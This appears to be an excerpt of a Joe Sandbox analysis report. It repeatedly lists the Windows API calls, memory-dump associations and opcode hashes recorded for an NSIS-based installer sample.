                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                              • String ID: 9
                                                                                              • API String ID: 1149667376-2366072709
                                                                                              • Opcode ID: 7d41bcd3dae3dae80b68e9040ec7ff24257b7140080f1b6cb91404220a5539cb
                                                                                              • Instruction ID: a762cbfc482fee2f38ad097521ed942063d68533c50e5d13a1d21fd8ed512a93
                                                                                              • Opcode Fuzzy Hash: 7d41bcd3dae3dae80b68e9040ec7ff24257b7140080f1b6cb91404220a5539cb
                                                                                              • Instruction Fuzzy Hash: 2E51E671E04209ABDF24DF94DE88AAEB779FF14304F50443BE501B62D0D7B99A42CB69
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3294113728-0
                                                                                              • Opcode ID: 8b451d8cd6622de32c99822e6237a0e7f9a50def39b2f4336cbc506680b9bad0
                                                                                              • Instruction ID: 39eb73ea935b4093d5e0ae2fe9f4df3abe493bf7cf7ddc07517dddc298ecdb3a
                                                                                              • Opcode Fuzzy Hash: 8b451d8cd6622de32c99822e6237a0e7f9a50def39b2f4336cbc506680b9bad0
                                                                                              • Instruction Fuzzy Hash: 0531C272C00118BBDF11AFA5CE49DAF7E79EF08368F24423AF510762D0C6795E418BA9
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00421678,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                              • lstrlenW.KERNEL32(004030DB,00421678,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                              • lstrcatW.KERNEL32(00421678,004030DB,004030DB,00421678,00000000,?,00000000), ref: 0040507C
                                                                                              • SetWindowTextW.USER32(00421678,00421678), ref: 0040508E
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2531174081-0
                                                                                              • Opcode ID: 5311de40b5e01d4a13010175000a2bad7d1c43204c7bd2962c1bae2d6e379ef0
                                                                                              • Instruction ID: 72d3c87754a4f2576c1daf3770cdfe6bbb79a9fd4797c08dd841ae8e1e27fedc
                                                                                              • Opcode Fuzzy Hash: 5311de40b5e01d4a13010175000a2bad7d1c43204c7bd2962c1bae2d6e379ef0
                                                                                              • Instruction Fuzzy Hash: AE219D71900518BBCB219F95DD84ADFBFB9EF45350F14807AF904B62A0C3798A41CFA8
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404906
                                                                                              • GetMessagePos.USER32 ref: 0040490E
                                                                                              • ScreenToClient.USER32(?,?), ref: 00404928
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040493A
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404960
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                              • Instruction ID: 5094cac0cfd66b0e8cfd3256396541bb223221662a15d93018ee399e52c78ab9
                                                                                              • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                              • Instruction Fuzzy Hash: B9014071D00219BADB00DBA4DD45FFFBBB8AB95B21F10016ABB10B71C0C7B4A5018B95
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                              • MulDiv.KERNEL32(?,00000064,?), ref: 00402CC8
                                                                                              • wsprintfW.USER32 ref: 00402CD8
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402CE8
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CFA
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402CD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: verifying installer: %d%%
                                                                                              • API String ID: 1451636040-82062127
                                                                                              • Opcode ID: 4a7d612a3107a8faa67c2a3ba57bc865a53d9af2ae63cae8aa971940a760aa5f
                                                                                              • Instruction ID: 00b8461607dcb0b3980451466b6828af2013657049940e2aaaac4a967361d4db
                                                                                              • Opcode Fuzzy Hash: 4a7d612a3107a8faa67c2a3ba57bc865a53d9af2ae63cae8aa971940a760aa5f
                                                                                              • Instruction Fuzzy Hash: F5012170604208BBEF249F60DD49BAE3B69FB00305F008039FA06A52D1DBB99954DB59
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033B7), ref: 0040606E
                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 0040607D
                                                                                              • CharNextW.USER32(?,00434000,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033B7), ref: 00406082
                                                                                              • CharPrevW.USER32(?,?,00436800,00436800,00000000,004031D7,00436800,74DF3420,004033B7), ref: 00406095
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: *?|<>/":
                                                                                              • API String ID: 589700163-165019052
                                                                                              • Opcode ID: 3b4e1c3ec424bf1de7da59c711653df59d062fb970fe0516104cac3d90234bf4
                                                                                              • Instruction ID: 5f8db4d4ef1aaeb388f58d13ad2a41ec80f6628d4c19804d17f22981d69c56f6
                                                                                              • Opcode Fuzzy Hash: 3b4e1c3ec424bf1de7da59c711653df59d062fb970fe0516104cac3d90234bf4
                                                                                              • Instruction Fuzzy Hash: 5311C45684121299DB30BB199C40BB7A2E8EF54790F52803FED8A733C1E77C5C9286BD
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,0040A550,000000FF,00409D50,00000400,?,?,00000021), ref: 0040252F
                                                                                              • lstrlenA.KERNEL32(00409D50,?,?,0040A550,000000FF,00409D50,00000400,?,?,00000021), ref: 00402536
                                                                                              • WriteFile.KERNEL32(00000000,?,00409D50,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                              • String ID: 8
                                                                                              • API String ID: 1453599865-4194326291
                                                                                              • Opcode ID: e4df8df7c44270ba33fb6fab13b76496744f5428df9d63e4514989387de34881
                                                                                              • Instruction ID: 7a030a9c095cf7661290fe091fec1a729e70b9dbbd1292938289fd6a30d2cb41
                                                                                              • Opcode Fuzzy Hash: e4df8df7c44270ba33fb6fab13b76496744f5428df9d63e4514989387de34881
                                                                                              • Instruction Fuzzy Hash: 18018071A04204FFD700AFA09E89EAF7378AB10319F20453BB202B61D1D6B85D419A2D
                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,00409550,00435000,?,?,00000031), ref: 00401793
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,00409550,00409550,00000000,00000000,00409550,00435000,?,?,00000031), ref: 004017B8
                                                                                                • Part of subcall function 00405D77: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281A0,NSIS Error), ref: 00405D84
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(00421678,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                • Part of subcall function 00405021: lstrlenW.KERNEL32(004030DB,00421678,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                • Part of subcall function 00405021: lstrcatW.KERNEL32(00421678,004030DB,004030DB,00421678,00000000,?,00000000), ref: 0040507C
                                                                                                • Part of subcall function 00405021: SetWindowTextW.USER32(00421678,00421678), ref: 0040508E
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                • Part of subcall function 00405021: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID:
                                                                                              • API String ID: 1941528284-0
                                                                                              • Opcode ID: 2dfaa2d881fc1c06d5e4e0df6492f18b4b0d9692730c2f93d6ef0e6210451604
                                                                                              • Instruction ID: f5340c52137ac8e05323c68babe13c17cc5cde59bf11d192bd930834dcc8acac
                                                                                              • Opcode Fuzzy Hash: 2dfaa2d881fc1c06d5e4e0df6492f18b4b0d9692730c2f93d6ef0e6210451604
                                                                                              • Instruction Fuzzy Hash: C6419071900908BACF11BBB5CC46DAF7679EF05368F20863BF425B11E1D73C8A419A6E
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: e0d8e9b4b7c3dced49d372e318274e4029313fc8c3479f6e652278d6efa82a2c
                                                                                              • Instruction ID: 24cb19e20ea0269922d23406ceb1d71d2baff7de250534ea652b51db9971d4c8
                                                                                              • Opcode Fuzzy Hash: e0d8e9b4b7c3dced49d372e318274e4029313fc8c3479f6e652278d6efa82a2c
                                                                                              • Instruction Fuzzy Hash: 2B113A71904008FEEF219F90DE89EAE3B79EB54348F104476FA05B10A0D3B59E51EA69
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 11a1351ddf50c58e35ddc122bd4c143b08e9209a670521ddf1897a2708112133
                                                                                              • Instruction ID: 5f088aa0ca27e90fd893fee14e64151101962dab4a112754cbcab5b472a91c15
                                                                                              • Opcode Fuzzy Hash: 11a1351ddf50c58e35ddc122bd4c143b08e9209a670521ddf1897a2708112133
                                                                                              • Instruction Fuzzy Hash: 53F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08315B104466F601F5190C674AD018B39
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401D44
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                              • CreateFontIndirectW.GDI32(0040BD58), ref: 00401DBC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2969253456.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969292369.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969311384.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2969337991.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 3808545654-0
                                                                                              • Opcode ID: 42c6c5e2fb934de57d2e5b0808f6da945959834788a5d09a16a54919abba70a7
                                                                                              • Instruction ID: 50cd7c3d9b324c63c10bedbdfe153cfa446442d7209eb1202fb80f546c31283e
                                                                                              • Opcode Fuzzy Hash: 42c6c5e2fb934de57d2e5b0808f6da945959834788a5d09a16a54919abba70a7
                                                                                              • Instruction Fuzzy Hash: D3016D71944280AFEB116BB0AE0AB9ABF74DF55301F14847AF141B62F2C7791005DBAE
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00422698,00422698,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404896
                                                                                              • wsprintfW.USER32 ref: 0040489F
                                                                                              • SetDlgItemTextW.USER32(?,00422698), ref: 004048B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2969273046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
